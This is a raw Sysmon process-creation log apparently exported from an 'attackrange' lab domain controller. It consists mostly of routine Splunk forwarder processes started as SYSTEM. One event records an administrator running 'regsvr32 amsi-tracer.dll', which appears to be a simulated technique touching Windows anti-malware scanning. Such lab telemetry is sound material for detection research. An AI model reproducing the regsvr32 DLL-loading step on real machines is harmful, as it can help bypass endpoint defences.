154100x800000000000000032333Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:17.217{A8622C2F-49C1-6078-4C06-00000000AE01}564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:23.231{A8622C2F-498B-6078-4B06-00000000AE01}3684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032201Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:21.728{A8622C2F-4989-6078-4A06-00000000AE01}5452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032189Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:21.108{A8622C2F-4989-6078-4906-00000000AE01}1776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032180Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:20.333{A8622C2F-4988-6078-4806-00000000AE01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032169Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:18.548{A8622C2F-4986-6078-4706-00000000AE01}6592C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032159Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:17.889{A8622C2F-4985-6078-4606-00000000AE01}7032C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032149Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:11:17.209{A8622C2F-4985-6078-4506-00000000AE01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032060Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:23.217{A8622C2F-494F-6078-4406-00000000AE01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032046Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:21.705{A8622C2F-494D-6078-4306-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:21.085{A8622C2F-494D-6078-4206-00000000AE01}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032025Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:20.315{A8622C2F-494C-6078-4106-00000000AE01}5816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032014Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:18.527{A8622C2F-494A-6078-4006-00000000AE01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032003Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:17.868{A8622C2F-4949-6078-3F06-00000000AE01}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031994Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:10:17.188{A8622C2F-4949-6078-3E06-00000000AE01}796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031876Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:23.211{A8622C2F-4913-6078-3D06-00000000AE01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031864Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:21.689{A8622C2F-4911-6078-3C06-00000000AE01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031851Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:21.075{A8622C2F-4911-6078-3B06-00000000AE01}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031841Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:20.345{A8622C2F-4910-6078-3A06-00000000AE01}4216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031832Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:18.543{A8622C2F-490E-6078-3906-00000000AE01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031822Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:17.881{A8622C2F-490D-6078-3806-00000000AE01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031813Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:09:17.199{A8622C2F-490D-6078-3706-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031706Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:23.212{A8622C2F-48D7-6078-3606-00000000AE01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031684Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:21.674{A8622C2F-48D5-6078-3506-00000000AE01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031671Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:21.069{A8622C2F-48D5-6078-3406-00000000AE01}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031661Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:20.356{A8622C2F-48D4-6078-3306-00000000AE01}3648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031630Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:18.527{A8622C2F-48D2-6078-3006-00000000AE01}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:17.859{A8622C2F-48D1-6078-2F06-00000000AE01}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031610Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:17.192{A8622C2F-48D1-6078-2E06-00000000AE01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031452Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:53.781{A8622C2F-48B9-6078-2C06-00000000AE01}6380C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEregsvr32 amsi-tracer.dllC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 154100x800000000000000031310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:23.200{A8622C2F-489B-6078-2A06-00000000AE01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031298Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:21.741{A8622C2F-4899-6078-2906-00000000AE01}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031286Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:21.069{A8622C2F-4899-6078-2806-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031276Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:20.348{A8622C2F-4898-6078-2706-00000000AE01}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 